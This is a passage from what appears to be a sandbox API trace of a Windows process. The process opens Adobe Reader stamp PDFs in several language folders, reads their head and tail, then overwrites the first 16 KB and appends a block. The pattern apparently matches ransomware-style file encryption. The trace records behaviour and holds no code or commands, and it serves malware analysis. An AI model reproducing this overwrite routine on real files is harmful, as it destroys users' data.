(lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0064.930] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.930] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1b7c1 [0064.930] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.930] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.930] ReleaseMutex (hMutex=0x168) returned 1 [0064.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0064.931] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0064.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a7c1 [0064.933] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a7c1 [0064.934] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.935] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0064.935] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.935] CloseHandle (hObject=0x1cc) returned 1 [0064.948] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0064.949] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.949] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8ff9 [0064.949] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.949] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.949] ReleaseMutex (hMutex=0x168) returned 1 [0064.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.949] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0064.951] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7ff9 [0064.951] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.952] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7ff9 [0064.952] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.953] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0064.953] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.953] CloseHandle (hObject=0x1cc) returned 1 [0064.960] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0064.961] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.961] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd074 [0064.961] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.961] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.961] ReleaseMutex (hMutex=0x168) returned 1 [0064.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.961] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0064.964] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xc074 [0064.964] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.964] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xc074 [0064.965] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668a68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.965] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0064.965] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.965] CloseHandle (hObject=0x1cc) returned 1 [0065.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.132] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x907a [0065.133] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.133] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.133] ReleaseMutex (hMutex=0x168) returned 1 [0065.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0065.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0065.133] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0065.136] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x807a [0065.137] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.137] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x807a [0065.137] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.137] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.137] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.137] CloseHandle (hObject=0x1cc) returned 1 [0065.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.139] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x19c87 [0065.140] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.140] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.140] ReleaseMutex (hMutex=0x168) returned 1 [0065.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0065.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0065.140] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0065.142] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x18c87 [0065.142] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.144] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x18c87 [0065.144] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.145] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.145] WriteFile (in: hFile=0x1cc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.145] CloseHandle (hObject=0x1cc) returned 1 [0065.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.154] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.154] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x80f5 [0065.155] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.155] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.155] ReleaseMutex (hMutex=0x168) returned 1 [0065.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0065.155] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0065.157] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x70f5 [0065.158] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.158] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x70f5 [0065.158] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.158] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.158] WriteFile (in: hFile=0x1cc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.159] CloseHandle (hObject=0x1cc) returned 1 [0065.161] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.161] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.161] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb9dd [0065.162] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.162] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.162] ReleaseMutex (hMutex=0x168) returned 1 [0065.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.162] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0065.164] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa9dd [0065.164] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0065.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa9dd [0065.165] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea99b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0065.165] WriteFile (in: hFile=0x1cc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.165] CloseHandle (hObject=0x1cc) returned 1 [0065.168] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0065.169] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.169] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x26254 [0065.169] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0065.169] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.169] ReleaseMutex (hMutex=0x168) returned 1 [0065.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0065.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0065.169] ReadFile (in: hFile=0x1cc, 